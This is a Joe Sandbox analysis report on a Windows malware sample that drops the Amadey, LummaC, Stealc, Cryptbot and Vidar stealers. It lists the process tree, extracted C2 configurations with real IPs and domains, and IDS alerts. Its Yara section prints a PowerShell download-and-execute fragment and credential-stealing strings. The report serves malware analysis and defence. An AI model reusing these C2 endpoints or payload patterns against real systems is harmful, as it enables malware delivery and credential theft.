Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ebjtOH70jl.exe

Overview

General Information

Sample name:ebjtOH70jl.exe
renamed because original name is a hash value
Original sample name:9b85ae26f1588d1238395258076430b282476882128aeec79066bf10af37d8e2.exe
Analysis ID:1583666
MD5:f775d21b5bfde4169416087324a43543
SHA1:30dbffdc709395bbd168ad9bee1b17239ac31dbf
SHA256:9b85ae26f1588d1238395258076430b282476882128aeec79066bf10af37d8e2
Tags:Amadeyexeuser-zhuzhu0009
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ebjtOH70jl.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\ebjtOH70jl.exe" MD5: F775D21B5BFDE4169416087324A43543)
    • axplong.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: F775D21B5BFDE4169416087324A43543)
  • axplong.exe (PID: 2800 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: F775D21B5BFDE4169416087324A43543)
    • legs.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe" MD5: 75CF470500D65CE4411790E09E650806)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • legs.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe" MD5: 75CF470500D65CE4411790E09E650806)
    • am209.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\1004899001\am209.exe" MD5: CE27255F0EF33CE6304E54D171E6547C)
      • defnur.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe" MD5: CE27255F0EF33CE6304E54D171E6547C)
    • stealc_valenciga.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe" MD5: 89AD45B4A0E2D547C1E09D0A1EA94DF6)
      • chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2132,i,6862776677671730943,9850295633516414463,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • gold123.exe (PID: 6468 cmdline: "C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe" MD5: 122570B1D9D8FA848F3BFE02A1AB1A7B)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gold1111111111.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe" MD5: 4F3C6C19B0078AFB9AC1E6D2CE6116E7)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • gold1111111111.exe (PID: 7144 cmdline: "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe" MD5: 4F3C6C19B0078AFB9AC1E6D2CE6116E7)
    • liddad.exe (PID: 6452 cmdline: "C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe" MD5: 66178E76829F947721EE5F995434D37F)
    • client_jackbastadguy.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe" MD5: E8A21B7C1DBF57E585F28C10631647CF)
      • client_jackbastadguy.exe (PID: 2076 cmdline: "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe" MD5: E8A21B7C1DBF57E585F28C10631647CF)
        • cmd.exe (PID: 6180 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 0d261d49cf.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe" MD5: AC83F35170E7E84000CC5A17472BE30B)
      • chrome.exe (PID: 3300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2992 --field-trial-handle=2872,i,6481085930284923774,17691791159030812359,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 834ad20df2.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe" MD5: 97AF5B90F7A80FC9629DD3A0D3DC92A8)
      • skotes.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 97AF5B90F7A80FC9629DD3A0D3DC92A8)
    • 3e641862d3.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe" MD5: 3D47CE3BB786721E47FC7C5FC4F3ECBE)
    • 305d0bf1b2.exe (PID: 4632 cmdline: "C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe" MD5: D6B0130E6CDD9D6FE53D0A4D23EA9CBD)
  • skotes.exe (PID: 5628 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 97AF5B90F7A80FC9629DD3A0D3DC92A8)
  • 0d261d49cf.exe (PID: 2264 cmdline: "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe" MD5: AC83F35170E7E84000CC5A17472BE30B)
  • defnur.exe (PID: 3668 cmdline: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe MD5: CE27255F0EF33CE6304E54D171E6547C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "discokeyus.lat", "sustainskelet.lat", "aspecteirs.lat", "rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat", "pancakedipyps.click"], "Build id": "FATE99--dec"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: Cryptbot

{"C2 list": ["home.fortth14vs.top", ".forhttpvs.top", "indohome.fortth14vs.top", "wgPhome.fortth14vs.top"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\1004899001\am209.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeJoeSecurity_StealcYara detected StealcJoe Security
            C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeinfostealer_win_stealc_str_oct24Finds Stealc standalone samples (or dumps) based on the stringsSekoia.io
            • 0x33dd0:$str01: -nop -c "iex(New-Object Net.WebClient).DownloadString(
            • 0x33f28:$str02: Azure\.IdentityService
            • 0x33f4c:$str03: steam_tokens.txt
            • 0x33be0:$str04: "encrypted_key":"
            • 0x33d08:$str05: prefs.js
            • 0x33d80:$str06: browser: FileZilla
            • 0x33d94:$str07: profile: null
            • 0x33da4:$str08: url:
            • 0x33dac:$str09: login:
            • 0x33db4:$str10: password:
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeJoeSecurity_StealcYara detected StealcJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exeinfostealer_win_stealc_str_oct24Finds Stealc standalone samples (or dumps) based on the stringsSekoia.io
              • 0x33dd0:$str01: -nop -c "iex(New-Object Net.WebClient).DownloadString(
              • 0x33f28:$str02: Azure\.IdentityService
              • 0x33f4c:$str03: steam_tokens.txt
              • 0x33be0:$str04: "encrypted_key":"
              • 0x33d08:$str05: prefs.js
              • 0x33d80:$str06: browser: FileZilla
              • 0x33d94:$str07: profile: null
              • 0x33da4:$str08: url:
              • 0x33dac:$str09: login:
              • 0x33db4:$str10: password:
              Click to see the 2 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                      0000000B.00000000.2396771733.00000000007BB000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                        Click to see the 26 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        9.0.defnur.exe.dd0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          35.2.defnur.exe.dd0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                            8.2.am209.exe.690000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                              8.0.am209.exe.690000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                                11.0.stealc_valenciga.exe.790000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                                  Click to see the 15 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d261d49cf.exe
                                  Sigma detected: Browser Started with Remote Debugging
                                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, ParentProcessId: 6128, ParentProcessName: stealc_valenciga.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 6900, ProcessName: chrome.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 2800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d261d49cf.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:10.899228+010020283713Unknown Traffic192.168.2.449818188.114.97.3443TCP
                                  2025-01-03T09:50:12.172414+010020283713Unknown Traffic192.168.2.449826188.114.97.3443TCP
                                  2025-01-03T09:50:13.424061+010020283713Unknown Traffic192.168.2.449837188.114.97.3443TCP
                                  2025-01-03T09:50:16.597193+010020283713Unknown Traffic192.168.2.449861188.114.97.3443TCP
                                  2025-01-03T09:50:18.664165+010020283713Unknown Traffic192.168.2.449883188.114.97.3443TCP
                                  2025-01-03T09:50:19.912091+010020283713Unknown Traffic192.168.2.449898172.67.156.127443TCP
                                  2025-01-03T09:50:21.115507+010020283713Unknown Traffic192.168.2.449910188.114.97.3443TCP
                                  2025-01-03T09:50:21.399227+010020283713Unknown Traffic192.168.2.449913172.67.156.127443TCP
                                  2025-01-03T09:50:23.065813+010020283713Unknown Traffic192.168.2.449931188.114.97.3443TCP
                                  2025-01-03T09:50:23.611771+010020283713Unknown Traffic192.168.2.449934172.67.156.127443TCP
                                  2025-01-03T09:50:25.001315+010020283713Unknown Traffic192.168.2.449945172.67.156.127443TCP
                                  2025-01-03T09:50:26.246877+010020283713Unknown Traffic192.168.2.449955172.67.156.127443TCP
                                  2025-01-03T09:50:26.392061+010020283713Unknown Traffic192.168.2.449957188.114.97.3443TCP
                                  2025-01-03T09:50:28.578914+010020283713Unknown Traffic192.168.2.449974172.67.156.127443TCP
                                  2025-01-03T09:50:30.470394+010020283713Unknown Traffic192.168.2.449988172.67.156.127443TCP
                                  2025-01-03T09:50:32.511339+010020283713Unknown Traffic192.168.2.450004172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.692315+010020546531A Network Trojan was detected192.168.2.449818188.114.97.3443TCP
                                  2025-01-03T09:50:12.639246+010020546531A Network Trojan was detected192.168.2.449826188.114.97.3443TCP
                                  2025-01-03T09:50:20.785880+010020546531A Network Trojan was detected192.168.2.449898172.67.156.127443TCP
                                  2025-01-03T09:50:21.892928+010020546531A Network Trojan was detected192.168.2.449913172.67.156.127443TCP
                                  2025-01-03T09:50:33.006161+010020546531A Network Trojan was detected192.168.2.450004172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.692315+010020498361A Network Trojan was detected192.168.2.449818188.114.97.3443TCP
                                  2025-01-03T09:50:20.785880+010020498361A Network Trojan was detected192.168.2.449898172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:12.639246+010020498121A Network Trojan was detected192.168.2.449826188.114.97.3443TCP
                                  2025-01-03T09:50:21.892928+010020498121A Network Trojan was detected192.168.2.449913172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:10.899228+010020583981Domain Observed Used for C2 Detected192.168.2.449818188.114.97.3443TCP
                                  2025-01-03T09:50:12.172414+010020583981Domain Observed Used for C2 Detected192.168.2.449826188.114.97.3443TCP
                                  2025-01-03T09:50:13.424061+010020583981Domain Observed Used for C2 Detected192.168.2.449837188.114.97.3443TCP
                                  2025-01-03T09:50:16.597193+010020583981Domain Observed Used for C2 Detected192.168.2.449861188.114.97.3443TCP
                                  2025-01-03T09:50:18.664165+010020583981Domain Observed Used for C2 Detected192.168.2.449883188.114.97.3443TCP
                                  2025-01-03T09:50:21.115507+010020583981Domain Observed Used for C2 Detected192.168.2.449910188.114.97.3443TCP
                                  2025-01-03T09:50:23.065813+010020583981Domain Observed Used for C2 Detected192.168.2.449931188.114.97.3443TCP
                                  2025-01-03T09:50:26.392061+010020583981Domain Observed Used for C2 Detected192.168.2.449957188.114.97.3443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:19.912091+010020586231Domain Observed Used for C2 Detected192.168.2.449898172.67.156.127443TCP
                                  2025-01-03T09:50:21.399227+010020586231Domain Observed Used for C2 Detected192.168.2.449913172.67.156.127443TCP
                                  2025-01-03T09:50:23.611771+010020586231Domain Observed Used for C2 Detected192.168.2.449934172.67.156.127443TCP
                                  2025-01-03T09:50:25.001315+010020586231Domain Observed Used for C2 Detected192.168.2.449945172.67.156.127443TCP
                                  2025-01-03T09:50:26.246877+010020586231Domain Observed Used for C2 Detected192.168.2.449955172.67.156.127443TCP
                                  2025-01-03T09:50:28.578914+010020586231Domain Observed Used for C2 Detected192.168.2.449974172.67.156.127443TCP
                                  2025-01-03T09:50:30.470394+010020586231Domain Observed Used for C2 Detected192.168.2.449988172.67.156.127443TCP
                                  2025-01-03T09:50:32.511339+010020586231Domain Observed Used for C2 Detected192.168.2.450004172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:07.146387+010020446961A Network Trojan was detected192.168.2.449791185.215.113.1680TCP
                                  2025-01-03T09:50:09.563594+010020446961A Network Trojan was detected192.168.2.449807185.215.113.1680TCP
                                  2025-01-03T09:50:11.684265+010020446961A Network Trojan was detected192.168.2.449820185.215.113.1680TCP
                                  2025-01-03T09:50:14.291539+010020446961A Network Trojan was detected192.168.2.449842185.215.113.1680TCP
                                  2025-01-03T09:50:19.203267+010020446961A Network Trojan was detected192.168.2.449884185.215.113.1680TCP
                                  2025-01-03T09:50:28.610356+010020446961A Network Trojan was detected192.168.2.449971185.215.113.1680TCP
                                  2025-01-03T09:50:42.393281+010020446961A Network Trojan was detected192.168.2.450061185.215.113.1680TCP
                                  2025-01-03T09:50:48.281114+010020446961A Network Trojan was detected192.168.2.450064185.215.113.1680TCP
                                  2025-01-03T09:50:52.672664+010020446961A Network Trojan was detected192.168.2.450066185.215.113.1680TCP
                                  2025-01-03T09:50:56.919818+010020446961A Network Trojan was detected192.168.2.450068185.215.113.1680TCP
                                  2025-01-03T09:51:03.839407+010020446961A Network Trojan was detected192.168.2.450085185.215.113.1680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:10.412074+010020583971Domain Observed Used for C2 Detected192.168.2.4529851.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:19.420474+010020586221Domain Observed Used for C2 Detected192.168.2.4591641.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.721695+010020442451Malware Command and Control Activity Detected135.181.65.21680192.168.2.449819TCP
                                  2025-01-03T09:50:51.938250+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.450065TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.715662+010020442441Malware Command and Control Activity Detected192.168.2.449819135.181.65.21680TCP
                                  2025-01-03T09:50:51.910410+010020442441Malware Command and Control Activity Detected192.168.2.450065185.215.113.20680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.920539+010020442461Malware Command and Control Activity Detected192.168.2.449819135.181.65.21680TCP
                                  2025-01-03T09:50:52.159890+010020442461Malware Command and Control Activity Detected192.168.2.450065185.215.113.20680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:12.624291+010020442481Malware Command and Control Activity Detected192.168.2.449819135.181.65.21680TCP
                                  2025-01-03T09:50:53.358957+010020442481Malware Command and Control Activity Detected192.168.2.450065185.215.113.20680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:12.180388+010020442471Malware Command and Control Activity Detected135.181.65.21680192.168.2.449819TCP
                                  2025-01-03T09:50:52.170374+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.450065TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:21.573845+010020480941Malware Command and Control Activity Detected192.168.2.449910188.114.97.3443TCP
                                  2025-01-03T09:50:24.250485+010020480941Malware Command and Control Activity Detected192.168.2.449934172.67.156.127443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:11.510432+010020442431Malware Command and Control Activity Detected192.168.2.449819135.181.65.21680TCP
                                  2025-01-03T09:50:51.674603+010020442431Malware Command and Control Activity Detected192.168.2.450065185.215.113.20680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:04.061611+010028561471A Network Trojan was detected192.168.2.449770185.215.113.1680TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:04.328619+010028561221A Network Trojan was detected185.215.113.1680192.168.2.449770TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:04.551519+010028033053Unknown Traffic192.168.2.449770185.215.113.1680TCP
                                  2025-01-03T09:50:07.397483+010028033053Unknown Traffic192.168.2.449791185.215.113.1680TCP
                                  2025-01-03T09:50:09.791132+010028033053Unknown Traffic192.168.2.449807185.215.113.1680TCP
                                  2025-01-03T09:50:11.910887+010028033053Unknown Traffic192.168.2.449820185.215.113.1680TCP
                                  2025-01-03T09:50:15.561274+010028033053Unknown Traffic192.168.2.449848140.82.121.3443TCP
                                  2025-01-03T09:50:20.250223+010028033053Unknown Traffic192.168.2.449893140.82.121.3443TCP
                                  2025-01-03T09:50:29.688966+010028033053Unknown Traffic192.168.2.449976140.82.121.3443TCP
                                  2025-01-03T09:50:42.620125+010028033053Unknown Traffic192.168.2.450061185.215.113.1680TCP
                                  2025-01-03T09:50:48.506796+010028033053Unknown Traffic192.168.2.450064185.215.113.1680TCP
                                  2025-01-03T09:50:53.377315+010028033053Unknown Traffic192.168.2.45006731.41.244.1180TCP
                                  2025-01-03T09:50:57.700407+010028033053Unknown Traffic192.168.2.45007531.41.244.1180TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:50:12.831145+010028033043Unknown Traffic192.168.2.449819135.181.65.21680TCP
                                  2025-01-03T09:50:24.531951+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
                                  2025-01-03T09:50:25.429448+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
                                  2025-01-03T09:50:26.071603+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
                                  2025-01-03T09:50:26.584723+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
                                  2025-01-03T09:50:28.273032+010028033043Unknown Traffic192.168.2.449920135.181.65.21680TCP
